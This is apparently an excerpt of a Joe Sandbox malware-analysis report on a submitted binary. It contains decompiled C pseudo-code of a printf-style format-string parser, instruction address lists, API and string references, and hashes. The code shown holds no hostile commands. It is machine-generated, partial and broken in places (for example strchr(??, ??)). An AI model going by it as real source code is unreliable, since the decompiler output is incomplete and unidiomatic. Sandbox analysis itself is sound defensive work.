													goto L46;
												}
												__eflags = _t644 - 0x30 - 9;
												if(_t644 - 0x30 > 9) {
													goto L202;
												}
												do {
													_t580 =  &(_t580[1]);
													_t497 =  *_t580;
													_t601 = _t497;
													__eflags = _t497 - 0x30 - 9;
												} while (_t497 - 0x30 <= 9);
												goto L202;
											} else {
												 *(_t666 - 0x50) = 0;
												 *(_t666 - 0x4c) = 0;
												_t582 =  &(( *(_t666 - 0x54))[1]);
												 *(_t666 - 0x54) = _t582;
												L28:
												 *_t670 = "+-\' 0#";
												_t670[1] =  *_t582;
												if(strchr(??, ??) != 0) {
													_t582 =  &(_t582[1]);
													__eflags = _t582;
													goto L28;
												}
												 *(_t666 - 0x54) = _t582;
												_t602 =  *_t582 & 0x000000ff;
												if(_t602 == 0x2a) {
													 *(_t666 - 0x54) =  &(_t582[1]);
													_t503 = L00427360(_t666 - 0x54);
													__eflags = _t503;
													 *(_t666 - 0x50) = _t503;
													if(_t503 != 0) {
														_t504 =  *(_t666 - 0x54);
														_t582 =  &(_t504[1]);
														 *(_t666 - 0x54) = _t582;
														_t602 = _t504[1] & 0x000000ff;
													} else {
														_t582 =  *(_t666 - 0x54);
														 *(_t666 - 0x74) = 0;
														_t602 =  *_t582 & 0x000000ff;
													}
													L33:
													if(_t602 == 0x2e) {
														 *(_t666 - 0x54) =  &(_t582[1]);
														_t506 = _t582[1];
														__eflags = _t506 - 0x2a;
														if(_t506 == 0x2a) {
															 *(_t666 - 0x54) =  &(_t582[2]);
															_t508 = L00427360(_t666 - 0x54);
															__eflags = _t508;
															 *(_t666 - 0x4c) = _t508;
															if(_t508 == 0) {
																E00426D00(_t666 - 0x54);
																_t581 =  *(_t666 - 0x54);
																_t603 =  *_t581 & 0x000000ff;
																L179:
																__eflags = _t603 - 0x25;
																if(_t603 == 0x25) {
																	L46:
																	_t659 =  &(_t581[1]);
																	 *(_t666 - 0x54) = _t659;
																	if( *_t581 != 0) {
																		goto L24;
																	}
																	goto L48;
																}
																L180:
																_t576 = _t659;
																_t659 =  *(_t666 - 0x84);
																goto L23;
															}
															 *(_t666 - 0x54) =  &(( *(_t666 - 0x54))[1]);
															goto L34;
														}
														_t585 =  &(_t582[2]);
														__eflags = _t506 - 0x30 - 9;
														if(_t506 - 0x30 > 9) {
															goto L34;
														} else {
															goto L214;
														}
														do {
															L214:
															_t527 = _t585;
															 *(_t666 - 0x54) = _t585;
															_t585 =  &(_t585[1]);
															__eflags =  *_t527 - 0x30 - 9;
														} while ( *_t527 - 0x30 <= 9);
														_t512 = E00426D00(_t666 - 0x54);
														__eflags = _t512 - 1;
														_t623 = _t512;
														if(_t512 != 1) {
															L35:
															if(_t512 == 4) {
																L177:
																_t581 =  *(_t666 - 0x54);
																 *((intOrPtr*)(_t666 - 0x8c)) = 0;
																__eflags =  *(_t666 - 0x74);
																if( *(_t666 - 0x74) != 0) {
																	L37:
																	_t514 =  *_t581;
																	 *(_t666 - 0x8d) = _t514;
																	_t670[1] = _t514;
																	 *_t670 = "aAeEfFgGcCdiouxXnpsS";
																	_t515 = strchr(??, ??);
																	_t603 =  *(_t666 - 0x8d) & 0x000000ff;
																	if(_t515 == 0) {
																		goto L179;
																	}
																	_t650 =  &(1[(_t515 - "aAeEfFgGcCdiouxXnpsS" >> 0x0000001f & 0x00000007) + _t515 - "aAeEfFgGcCdiouxXnpsS" >> 3]);
																	if(_t650 <= 0) {
																		goto L179;
																	}
																	_t626 =  *((intOrPtr*)(_t666 - 0x8c));
																	 *(_t666 - 0x5c) = _t603;
																	_t663 = _t626;
																	 *((char*)(_t666 - 0x5b)) = _t626;
																	 *(_t666 - 0x84) = L00427410(_t666 - 0x5c);
																	_t627 =  &(( *(_t666 - 0x70))[ *(_t666 - 0x74) * 2 - 2]);
																	if( *_t627 != 0) {
																		 *(_t666 - 0x74) = _t627;
																		_t521 = L00427410(_t627);
																		_t627 =  *(_t666 - 0x74);
																		__eflags =  *(_t666 - 0x84) - _t521;
																		if( *(_t666 - 0x84) <= _t521) {
																			L41:
																			_t522 = _t666 - 0x50;
																			_t664 = _t666 - 0x48;
																			do {
																				_t628 =  *_t522;
																				_t607 = _t628 - 1;
																				 *_t522 = _t607;
																				if(_t628 > 0) {
																					_t629 =  *(_t666 - 0x70) + _t607 * 2;
																					if( *_t629 == 0) {
																						 *_t629 = 0x64;
																					}
																				}
																				_t522 =  &(_t522[1]);
																			} while (_t664 != _t522);
																			goto L46;
																		}
																	}
																	 *_t627 = _t650;
																	1[_t627] = _t663;
																	goto L41;
																}
																L178:
																_t603 =  *_t581 & 0x000000ff;
																goto L179;
															}
															 *((intOrPtr*)(_t666 - 0x8c)) = _t623;
															_t581 =  *(_t666 - 0x54);
															if( *(_t666 - 0x74) == 0) {
																goto L178;
															}
															goto L37;
														}
														goto L177;
													}
													L34:
													_t512 = E00426D00(_t666 - 0x54);
													_t623 = _t512;
													if(_t512 == 1) {
														goto L177;
													}
													goto L35;
												}
												_t531 =  &(_t582[1]);
												if(_t602 - 0x30 <= 9) {
													do {
														 *(_t666 - 0x54) = _t531;
														_t630 =  *_t531;
														_t582 = _t531;
														_t531 =  &(_t531[1]);
														_t602 = _t630;
													} while (_t630 - 0x30 <= 9);
												}
												goto L33;
											}
											L20:
											_t482 =  &(_t482[2]);
											 *((short*)(_t482 - 2)) = 0;
											if(_t618 != _t482) {
												goto L20;
											} else {
												 *(_t666 - 0x70) = _t641;
												goto L24;
											}
										}
									}
								}
								goto L79;
							}
							asm("cdq");
							_t612 = (_t612 & 0x00000007) + _t545 - "aAeEfFgGcCdiouxXnpsS" >> 3;
							__eflags = _t612 - 0xffffffff;
							if(_t612 == 0xffffffff) {
								goto L80;
							}
							__eflags =  *(_t666 - 0x6c) - _t653;
							if( *(_t666 - 0x6c) < _t653) {
								 *(_t666 - 0x6c) = _t653;
							}
							goto L79;
						}
						 *(_t666 - 0x58) =  &(_t586[1]);
						_t548 = _t586[1];
						__eflags = _t548 - 0x2a;
						if(_t548 == 0x2a) {
							 *(_t666 - 0x58) =  &(_t586[2]);
							_t550 = L00427360(_t666 - 0x58);
							__eflags = _t550;
							if(_t550 == 0) {
								goto L225;
							}
							__eflags = _t653 - _t550;
							if(_t653 < _t550) {
								_t653 = _t550;
								 *(_t666 - 0x58) =  &(( *(_t666 - 0x58))[1]);
							} else {
								 *(_t666 - 0x58) =  &(( *(_t666 - 0x58))[1]);
							}
							goto L75;
						}
						_t592 =  &(_t586[2]);
						__eflags = _t548 - 0x30 - 9;
						if(_t548 - 0x30 > 9) {
							goto L75;
						}
						do {
							_t552 = _t592;
							 *(_t666 - 0x58) = _t592;
							_t592 =  &(_t592[1]);
							__eflags =  *_t552 - 0x30 - 9;
						} while ( *_t552 - 0x30 <= 9);
						goto L75;
					}
					_t555 =  &(_t586[1]);
					_t612 = _t608 - 0x30;
					__eflags = _t612 - 9;
					if(_t612 > 9) {
						goto L70;
					}
					do {
						 *(_t666 - 0x58) = _t555;
						_t637 =  *_t555;
						_t586 = _t555;
						_t555 =  &(_t555[1]);
						_t608 = _t637;
						_t612 = _t637 - 0x30;
						__eflags = _t612 - 9;
					} while (_t612 <= 9);
					goto L70;
				}
			}

0x00428cf0
0x00428cf3
0x00428cf6
0x00428d03
0x00428d06
0x00428d0d
0x00428d11
0x00428d16
0x00428d18
0x00000000
0x00000000
0x00428d00
0x00428d00
0x00428d00
0x00428d1a
0x00428d1d
0x00428d20
0x00428d23
0x0042940e
0x00429411
0x00429416
0x00429418
0x004295f5
0x004295f8
0x004295fd
0x00429604
0x00428e03
0x00428e03
0x00428e03
0x00428e06
0x00428e06
0x00428e06
0x00428e09
0x00428e0c
0x00428e0f
0x00428e11
0x00000000
0x00000000
0x00428e17
0x00428e1a
0x00428e93
0x00000000
0x00428e93
0x00428e1f
0x00428e21
0x00428e23
0x00428e28
0x00428e2d
0x00428e2f
0x00428e38
0x00428e38
0x00428e3b
0x00428e3b
0x00428e41
0x00428e48
0x00428e4f
0x00428e56
0x00428e5d
0x00428e60
0x00428e66
0x00428e69
0x00428f5c
0x00428f5c
0x00000000
0x00428e6f
0x00428e6f
0x00428e6f
0x00428e72
0x00428e75
0x00428e7a
0x00428e7d
0x00428e7f
0x004293ab
0x004293ab
0x004293ae
0x004293b1
0x00428f78
0x00428f78
0x00428f7b
0x00428f83
0x00428f88
0x00000000
0x00428f88
0x004293b7
0x004293ba
0x004293bd
0x00000000
0x00000000
0x004293c3
0x004293c5
0x004294c5
0x004294c5
0x004294c9
0x004294cf
0x004294cf
0x004293d2
0x004293d2
0x004293d5
0x004293d7
0x00428f51
0x00428f51
0x00000000
0x00428f51
0x004293dd
0x004293df
0x004293e2
0x004293e4
0x004293e6
0x004293eb
0x004293eb
0x004293eb
0x004293f2
0x004293f4
0x00000000
0x004293f4
0x004293cb
0x00000000
0x004293cb
0x00428e85
0x00428e88
0x00000000
0x0042913e
0x00429141
0x00429143
0x00000000
0x00000000
0x00429149
0x0042914d
0x00000000
0x00000000
0x00000000
0x00000000
0x00429010
0x00429013
0x00429015
0x00000000
0x00000000
0x0042901b
0x00429022
0x00000000
0x00000000
0x00000000
0x00000000
0x004291e0
0x004291e3
0x004291e5
0x00000000
0x00000000
0x004291eb
0x004291ef
0x00000000
0x00000000
0x0042919e
0x004291a1
0x004291a3
0x00000000
0x00000000
0x004291a5
0x004291a9
0x004295a9
0x00000000
0x004295a9
0x004291af
0x004291b2
0x004291b4
0x0042963a
0x0042963a
0x0042963d
0x00429640
0x00429640
0x00429640
0x00429644
0x00429646
0x00429648
0x00429648
0x0042964a
0x00429651
0x00000000
0x00000000
0x00429657
0x0042965a
0x0042965c
0x004297d2
0x004297d9
0x00429662
0x00429662
0x00429669
0x0042966c
0x0042966e
0x0042966e
0x00000000
0x0042965c
0x004291ba
0x004291bd
0x004291c2
0x004291c4
0x00429637
0x00000000
0x00429637
0x004291ca
0x004291cd
0x004291d0
0x004291d4
0x004291d7
0x004291d9
0x00000000
0x00000000
0x00429185
0x00429188
0x0042918a
0x00000000
0x00000000
0x00429190
0x00429197
0x00000000
0x00000000
0x0042916c
0x0042916f
0x00429171
0x00000000
0x00000000
0x00429177
0x0042917e
0x00000000
0x00000000
0x00429154
0x00429158
0x00429676
0x00429679
0x00429680
0x00429687
0x00429689
0x00000000
0x00429689
0x00000000
0x00000000
0x00428f63
0x00428f66
0x00428f68
0x0042959b
0x004295a2
0x00000000
0x004295a2
0x00428f6e
0x00428f72
0x00000000
0x00000000
0x00000000
0x00000000
0x00429270
0x00429273
0x00429275
0x00429278
0x00000000
0x00000000
0x00000000
0x00000000
0x00429244
0x00000000
0x00000000
0x0042921d
0x00429220
0x00429222
0x00429225
0x00000000
0x00000000
0x00000000
0x00000000
0x004291f6
0x004291f9
0x004291fb
0x004291fe
0x00000000
0x00000000
0x00000000
0x00000000
0x00429293
0x00429296
0x00429298
0x0042929b
0x00000000
0x00000000
0x00000000
0x00000000
0x00428f0f
0x00428f12
0x00428f15
0x00428f1a
0x00428f1d
0x00428f20
0x00428f23
0x0042915e
0x0042915e
0x00429165
0x00000000
0x00429165
0x00428f29
0x00428f30
0x00000000
0x00000000
0x00428f36
0x00428f39
0x00000000
0x00000000
0x00428f3f
0x00000000
0x00000000
0x00428f46
0x00428f46
0x00428f46
0x00428f46
0x00428f4a
0x00000000
0x00000000
0x00429502
0x00429502
0x00429505
0x00429509
0x0042950b
0x0042950d
0x004297aa
0x004297aa
0x00429516
0x0042951b
0x0042951e
0x00429520
0x00429522
0x00429527
0x00000000
0x00000000
0x004292e3
0x004292e7
0x004292ea
0x00429760
0x00429763
0x00429765
0x00429769
0x0042976c
0x004292f0
0x004292f0
0x004292f4
0x004295c0
0x004295c4
0x004295c6
0x004295cd
0x004292fa
0x004292fa
0x004292fe
0x00429302
0x00429304
0x0042930b
0x0042930e
0x004296fa
0x004296fe
0x00429705
0x00429314
0x00429314
0x00429318
0x00429797
0x0042979b
0x004297a2
0x004297a2
0x00429318
0x0042930e
0x004292f4
0x0042931e
0x00429321
0x00000000
0x00429327
0x00429327
0x0042932a
0x0042932d
0x00429330
0x00429333
0x00429335
0x0042933a
0x00000000
0x0042933a
0x00000000
0x004292bd
0x004292c0
0x004292c2
0x004292c5
0x004292c8
0x0042927a
0x0042927a
0x0042927c
0x00429280
0x00429283
0x00429286
0x0042928b
0x00000000
0x0042928b
0x004292ca
0x004292ca
0x004292cc
0x004292d0
0x004292d3
0x004292d6
0x004292db
0x00000000
0x00000000
0x00429342
0x00429345
0x0042934c
0x0042934f
0x00429352
0x0042924b
0x0042924b
0x0042924e
0x00429251
0x00429256
0x0042925a
0x0042925c
0x00429260
0x00429263
0x00429268
0x00000000
0x00429268
0x00429358
0x0042935b
0x0042935e
0x00429363
0x00429367
0x00429369
0x0042936c
0x0042936f
0x00429374
0x00000000
0x00000000
0x004290e7
0x004290ee
0x004290f2
0x004290f5
0x0042974c
0x0042974f
0x00429751
0x00429755
0x00429758
0x004290fb
0x004290fb
0x004290ff
0x004295d5
0x004295d9
0x004295db
0x004295e1
0x00429105
0x00429105
0x00429109
0x0042910b
0x0042910e
0x00429111
0x00429115
0x00429118
0x004296e8
0x004296ec
0x004296f2
0x0042911e
0x0042911e
0x00429122
0x00429785
0x00429789
0x0042978f
0x0042978f
0x00429122
0x00429118
0x004290ff
0x00429128
0x00429128
0x0042912b
0x0042912e
0x00429131
0x00429136
0x00000000
0x00000000
0x004290bd
0x004290c0
0x004290c2
0x004290c5
0x004290c8
0x0042922b
0x0042922b
0x0042922d
0x00429231
0x00429234
0x00429237
0x0042923c
0x00000000
0x0042923c
0x004290ce
0x004290ce
0x004290d0
0x004290d4
0x004290d7
0x004290da
0x004290df
0x00000000
0x00000000
0x00429090
0x00429093
0x00429095
0x00429098
0x0042909b
0x00429204
0x00429204
0x00429206
0x0042920a
0x0042920d
0x00429210
0x00429215
0x00000000
0x00429215
0x004290a1
0x004290a1
0x004290a3
0x004290a7
0x004290aa
0x004290ad
0x004290b2
0x00000000
0x00000000
0x00429063
0x00429066
0x00429068
0x0042906b
0x0042906e
0x004292a1
0x004292a1
0x004292a3
0x004292a7
0x004292aa
0x004292ad
0x004292b2
0x00000000
0x004292b2
0x00429074
0x00429074
0x00429076
0x0042907a
0x0042907d
0x00429080
0x00429085
0x00000000
0x00000000
0x00429029
0x0042902d
0x00429030
0x00429739
0x0042973c
0x0042973e
0x00429742
0x00429744
0x00000000
0x00429744
0x00429036
0x0042903a
0x00429774
0x00429776
0x00429779
0x0042977d
0x00000000
0x0042977d
0x00429040
0x00429044
0x00429050
0x00429050
0x00429054
0x00429057
0x00429059
0x00000000
0x00429059
0x00429046
0x0042904a
0x004296d2
0x004296d6
0x004296d9
0x004296db
0x004296dd
0x004296e0
0x00000000
0x004296e0
0x00000000
0x00000000
0x00428fcc
0x00428fcf
0x00428fd1
0x00428fd3
0x00428fd6
0x00428fd9
0x0042970d
0x00429710
0x00429717
0x00429717
0x00428fd9
0x00428fdf
0x00428fe2
0x00428fe6
0x00428fe8
0x00428fef
0x00428ff2
0x00428ff5
0x00428ff8
0x00428ffb
0x00428ffe
0x00429003
0x00429008
0x00000000
0x00000000
0x00428f93
0x00428f96
0x00428f99
0x00000000
0x00000000
0x00428f9f
0x00428fa2
0x00428fa6
0x00428fa8
0x00428faa
0x004296c3
0x004296c8
0x00428fb0
0x00428fb8
0x00428fba
0x00428fba
0x00428fbc
0x00428fbf
0x00428fc4
0x00000000
0x00000000
0x00428f53
0x00428f53
0x00428f53
0x00000000
0x00428e6f
0x00428e69
0x00428ea3
0x00428ea5
0x00428eba
0x00428ebd
0x00428ec0
0x00428ecf
0x00428ecf
0x00428eb0
0x00428eb0
0x00428eb3
0x00428eb6
0x00428eb6
0x00000000
0x00428eb0
0x00428e03
0x0042941e
0x00429420
0x00429422
0x00429422
0x00429424
0x00429427
0x0042942a
0x0042942d
0x00428d55
0x00428d55
0x00428d58
0x00428d93
0x00428d96
0x00428d9e
0x00428da1
0x00428da4
0x00428da8
0x00428daf
0x00428db4
0x00428db6
0x00428dba
0x00428de0
0x00428de0
0x00428de3
0x00428a19
0x00428a19
0x00428a1b
0x00428a1e
0x00428a24
0x00428941
0x00428944
0x00428930
0x00428932
0x00428935
0x00428935
0x0042893b
0x00000000
0x00000000
0x00000000
0x0042893b
0x00428946
0x00428949
0x0042894c
0x00428952
0x00428959
0x0042895b
0x00000000
0x00000000
0x00428961
0x00428964
0x0042896a
0x00000000
0x00428970
0x00428970
0x00428973
0x00428986
0x00428988
0x0042898f
0x00428992
0x0042899d
0x00428980
0x00428980
0x00428983
0x00000000
0x00428983
0x0042899f
0x004289a1
0x004289a7
0x00428f03
0x00428f07
0x004289c5
0x004289c8
0x00428ed0
0x00428ed4
0x00428ed6
0x00429436
0x00000000
0x00429436
0x00428edf
0x00428ee2
0x00428ee5
0x00000000
0x00000000
0x00428ef0
0x00428ef0
0x00428ef9
0x00428ef9
0x00428efe
0x004289ce
0x004289d1
0x004289d4
0x004289d9
0x004289dc
0x004289df
0x004289eb
0x004289ef
0x004289f6
0x00428a0f
0x00428a13
0x00428dd7
0x00428dd7
0x00000000
0x00428dd7
0x00000000
0x00428a13
0x004289fd
0x00428a03
0x00428a09
0x00000000
0x00000000
0x00000000
0x00428a09
0x004289ad
0x004289ad
0x004289b3
0x00000000
0x00000000
0x00000000
0x00000000
0x004289b5
0x004289b5
0x004289b5
0x004289b8
0x004289bb
0x004289c0
0x00000000
0x004289b5
0x00428a30
0x00428a30
0x00428a30
0x00428a40
0x00428a45
0x00428a4a
0x00428a4e
0x00428a52
0x00428a55
0x00428a58
0x00000000
0x00428a5e
0x00428a5e
0x00428a61
0x00428a70
0x00428a75
0x00428a78
0x00428a7a
0x00428a7e
0x00428a81
0x00428a83
0x00428a83
0x00000000
0x00428ab1
0x00428ab4
0x00428aa0
0x00428aa2
0x00428aa2
0x00000000
0x00000000
0x00000000
0x00428aa5
0x00428aa5
0x00428aa8
0x00428aab
0x00428c40
0x00428c40
0x00428c43
0x00428c46
0x00428c50
0x00428c5b
0x00428c60
0x00000000
0x00000000
0x00428c62
0x00428c67
0x00428df7
0x00428df7
0x00428dfa
0x00428e00
0x00428e00
0x00000000
0x00428e00
0x00428c6d
0x00428c70
0x00428c73
0x00428c76
0x00428caf
0x00428caf
0x00428cb3
0x00428cb8
0x00428c80
0x00428c83
0x00429400
0x00429400
0x00000000
0x00429400
0x00428c89
0x00428c8c
0x00428c8f
0x00000000
0x00000000
0x00428c95
0x00428c98
0x00000000
0x00000000
0x00428c9e
0x00428c9e
0x00428c9e
0x00000000
0x00428c9e
0x00428cba
0x00428cc0
0x00428cd0
0x00000000
0x00000000
0x00000000
0x00428ca1
0x00428ca1
0x00428ca4
0x00428ca7
0x00000000
0x00428caf
0x00428df0
0x00000000
0x00428df0
0x00000000
0x00428ab6
0x00428ab6
0x00428ab9
0x00428abf
0x00428ac5
0x00428acc
0x00428acf
0x0042943e
0x00429441
0x00429453
0x00429453
0x00429456
0x0042945f
0x00429462
0x00429466
0x0042946b
0x0042946d
0x00000000
0x00000000
0x00429450
0x00429450
0x00429450
0x0042946f
0x00429471
0x00429473
0x00429476
0x00429479
0x004295e9
0x004295ed
0x004294a0
0x004294a0
0x004294a3
0x00429691
0x00429695
0x00429697
0x00429731
0x00000000
0x00429731
0x004296a0
0x004296a3
0x004296a6
0x00000000
0x00000000
0x004296b0
0x004296b0
0x004296b9
0x004296b9
0x004296be
0x004294a9
0x004294ac
0x004294af
0x004294b4
0x004294b7
0x004294ba
0x00000000
0x00000000
0x00000000
0x004294c0
0x00429482
0x00429485
0x00000000
0x00000000
0x00429490
0x00429490
0x00429493
0x00429496
0x0042949b
0x0042949b
0x00000000
0x00428ad5
0x00428ad8
0x00428adf
0x00428ae6
0x00428ae9
0x00428af3
0x00428af6
0x00428afd
0x00428b08
0x00428af0
0x00428af0
0x00000000
0x00428af0
0x00428b0a
0x00428b0d
0x00428b13
0x00429612
0x00429615
0x0042961a
0x0042961c
0x0042961f
0x0042971f
0x00429722
0x00429725
0x00429728
0x00429625
0x00429625
0x00429628
0x0042962f
0x0042962f
0x00428b45
0x00428b48
0x00429532
0x00429535
0x00429539
0x0042953b
0x004297ba
0x004297bd
0x004297c2
0x004297c4
0x004297c7
0x004297e3
0x004297e8
0x004297eb
0x00429395
0x00429395
0x00429398
0x00428c2a
0x00428c2a
0x00428c2d
0x00428c33
0x00000000
0x00000000
0x00000000
0x00428c33
0x0042939e
0x0042939e
0x004293a0
0x00000000
0x004293a0
0x004297c9
0x00000000
0x004297c9
0x00429544
0x00429547
0x0042954a
0x00000000
0x00000000
0x00000000
0x00000000
0x00429550
0x00429550
0x00429550
0x00429552
0x00429555
0x0042955e
0x0042955e
0x00429566
0x0042956b
0x0042956e
0x00429570
0x00428b61
0x00428b64
0x0042937c
0x00429381
0x00429384
0x0042938a
0x0042938c
0x00428b7e
0x00428b7e
0x00428b81
0x00428b87
0x00428b8b
0x00428b92
0x00428b99
0x00428ba0
0x00000000
0x00000000
0x00428bb8
0x00428bbd
0x00000000
0x00000000
0x00428bc3
0x00428bc9
0x00428bd1
0x00428bd3
0x00428bde
0x00428be7
0x00428bef
0x0042957d
0x00429580
0x0042958b
0x0042958e
0x00429590
0x00428bfe
0x00428bfe
0x00428c01
0x00428c04
0x00428c04
0x00428c06
0x00428c0b
0x00428c0d
0x00428c12
0x00428c19
0x00428c20
0x00428c20
0x00428c19
0x00428c23
0x00428c26
0x00000000
0x00428c04
0x00429596
0x00428bf7
0x00428bfb
0x00000000
0x00428bfb
0x00429392
0x00429392
0x00000000
0x00429392
0x00428b6d
0x00428b73
0x00428b78
0x00000000
0x00000000
0x00000000
0x00428b78
0x00000000
0x00429576
0x00428b4e
0x00428b51
0x00428b59
0x00428b5b
0x00000000
0x00000000
0x00000000
0x00428b5b
0x00428b1c
0x00428b25
0x00428b30
0x00428b30
0x00428b33
0x00428b36
0x00428b38
0x00428b3b
0x00428b40
0x00428b30
0x00000000
0x00428b25
0x00428a85
0x00428a87
0x00428a8a
0x00428a90
0x00000000
0x00428a92
0x00428a92
0x00000000
0x00428a92
0x00428a90
0x00428a58
0x00428a24
0x00000000
0x00428de9
0x00428dc1
0x00428dc7
0x00428dca
0x00428dcd
0x00000000
0x00000000
0x00428dcf
0x00428dd2
0x00428dd4
0x00428dd4
0x00000000
0x00428dd2
0x00428d5d
0x00428d60
0x00428d64
0x00428d66
0x004294e1
0x004294e4
0x004294e9
0x004294eb
0x00000000
0x00000000
0x004294f1
0x004294f3
0x004295b5
0x004295b7
0x004294f9
0x004294f9
0x004294f9
0x00000000
0x004294f3
0x00428d6f
0x00428d72
0x00428d75
0x00000000
0x00000000
0x00428d80
0x00428d80
0x00428d82
0x00428d85
0x00428d8e
0x00428d8e
0x00000000
0x00428d80
0x00428d2c
0x00428d2f
0x00428d32
0x00428d35
0x00000000
0x00000000
0x00428d40
0x00428d40
0x00428d43
0x00428d46
0x00428d48
0x00428d4b
0x00428d4d
0x00428d50
0x00428d50
0x00000000
0x00428d40

APIs

strchr.MSVCRT ref: 00428996
strchr.MSVCRT ref: 00428D11
strchr.MSVCRT ref: 00428DAF

Strings

aAeEfFgGcCdiouxXnpsS, xrefs: 004289DF, 004289F8, 00428B8B, 00428BA6, 00428DA8, 00428DBC
+-' 0#, xrefs: 00428988, 00428AF6, 00428D06

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strchr
String ID: +-' 0#$aAeEfFgGcCdiouxXnpsS
API String ID: 2830005266-3207406329
Opcode ID: 326c0faa58c913b9e797c8e6c5bfb3bac10bd75d2991bb9a6c3f67b8c9a4ba12
Instruction ID: 3b8160604fbb09c8d5258fe14d9684209e6e6ed31113cf0692ea66c85febf76e
Opcode Fuzzy Hash: 326c0faa58c913b9e797c8e6c5bfb3bac10bd75d2991bb9a6c3f67b8c9a4ba12
Instruction Fuzzy Hash: 74D1A171F056A98FCB20CF65D4803AEBBF2AF55300F98815FC851AB349EB789945CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00428CFC Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 316
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00428CFC(void* __ebx, void* __edi) {
				void* _t456;
				char* _t457;
				signed char _t467;
				char* _t471;
				char* _t472;
				signed int _t476;
				void* _t481;
				char* _t482;
				signed int _t483;
				signed int _t484;
				signed char* _t485;
				signed char* _t486;
				signed int _t488;
				char* _t490;
				signed char _t491;
				signed int _t497;
				signed int _t503;
				signed char* _t504;
				signed char _t506;
				char* _t508;
				intOrPtr _t512;
				char* _t514;
				char* _t515;
				void* _t521;
				signed int* _t522;
				signed char* _t527;
				signed char* _t531;
				char* _t532;
				signed int _t534;
				char* _t537;
				char* _t539;
				char* _t541;
				char* _t544;
				char* _t545;
				char _t548;
				char* _t550;
				char* _t552;
				char* _t555;
				signed char _t558;
				char* _t563;
				signed int _t569;
				signed char* _t572;
				signed char _t575;
				void* _t576;
				signed char* _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed char* _t581;
				signed char* _t582;
				signed char* _t583;
				signed char* _t586;
				char* _t587;
				signed int _t590;
				signed char* _t591;
				char* _t593;
				signed int _t594;
				signed char* _t595;
				char* _t596;
				signed int _t597;
				char* _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed char* _t614;
				signed char* _t616;
				void* _t618;
				void* _t619;
				signed int _t620;
				char* _t621;
				intOrPtr _t624;
				char _t627;
				signed int _t628;
				signed int _t629;
				short* _t630;
				signed int _t631;
				signed int _t638;
				char _t640;
				char* _t642;
				char* _t643;
				signed int _t644;
				signed int _t645;
				char* _t651;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed char* _t658;
				signed char* _t660;
				signed int _t661;
				char* _t662;
				signed int _t663;
				char _t664;
				void* _t665;
				signed int _t666;
				void* _t667;
				char** _t669;
				char** _t671;

				while(1) {
					L64:
					_t587 =  &(_t587[1]);
					__eflags = _t587;
					while(1) {
						 *_t669 = "+-\' 0#";
						_t669[1] =  *_t587;
						_t537 = strchr(??, ??);
						__eflags = _t537;
						if(_t537 != 0) {
							goto L64;
						}
						 *(_t667 - 0x58) = _t587;
						_t609 =  *_t587 & 0x000000ff;
						__eflags = _t609 - 0x2a;
						if(_t609 == 0x2a) {
							 *(_t667 - 0x58) =  &(_t587[1]);
							_t539 = L00427360(_t667 - 0x58);
							__eflags = _t539;
							if(_t539 == 0) {
								L225:
								_t640 = 0xffffffff;
								 *(_t667 - 0x6c) = 0;
								 *(_t667 - 0x80) = _t667 - 0x5c;
								while(1) {
									L84:
									_t614 =  *(_t667 + 0x14);
									while(1) {
										L85:
										_t658 =  &(_t614[1]);
										 *(_t667 + 0x14) = _t658;
										_t458 =  *_t614;
										__eflags = _t458;
										if(_t458 == 0) {
											break;
										}
										__eflags = _t458 - 0x25;
										if(_t458 != 0x25) {
											E00426FE0(_t458, _t667 - 0x48);
											goto L84;
										}
										_t595 = _t658;
										__eflags =  *(_t667 - 0x6c);
										if(__eflags != 0) {
											_t476 = L004273E0(_t667 + 0x14, __eflags);
											__eflags = _t476;
											if(_t476 > 0) {
												 *(_t667 + 0x18) = ( *(_t667 - 0x80))[_t476 * 4 - 4];
											}
											_t595 =  *(_t667 + 0x14);
										}
										 *(_t667 - 0x3c) = 0xffffffff;
										 *(_t667 - 0x40) = 0xffffffff;
										 *(_t667 - 0x74) = 0;
										 *(_t667 - 0x70) = 0;
										 *((intOrPtr*)(_t667 - 0x44)) =  *((intOrPtr*)(_t667 - 0x7c));
										__eflags =  *_t595;
										 *(_t667 - 0x78) = _t667 - 0x40;
										if( *_t595 == 0) {
											L112:
											_t614 = _t595;
											continue;
										} else {
											do {
												_t616 =  &(_t595[1]);
												 *(_t667 + 0x14) = _t616;
												_t575 =  *_t595;
												_t467 = _t575 - 0x20;
												__eflags = _t467 - 0x5a;
												if(__eflags > 0) {
													L181:
													_t596 =  *(_t667 - 0x70);
													__eflags = _t596 - 4;
													if(_t596 == 4) {
														L115:
														 *(_t667 + 0x14) = _t658;
														L116:
														E00426FE0(0x25, _t667 - 0x48);
														_t614 =  *(_t667 + 0x14);
														goto L85;
													}
													_t328 = _t575 - 0x30; // -48
													__eflags = _t328 - 9;
													if(_t328 > 9) {
														goto L115;
													}
													__eflags = _t596;
													if(_t596 != 0) {
														L205:
														__eflags =  *(_t667 - 0x70) - 2;
														if( *(_t667 - 0x70) == 2) {
															 *(_t667 - 0x70) = 3;
														}
														L185:
														_t471 =  *(_t667 - 0x78);
														__eflags = _t471;
														if(_t471 == 0) {
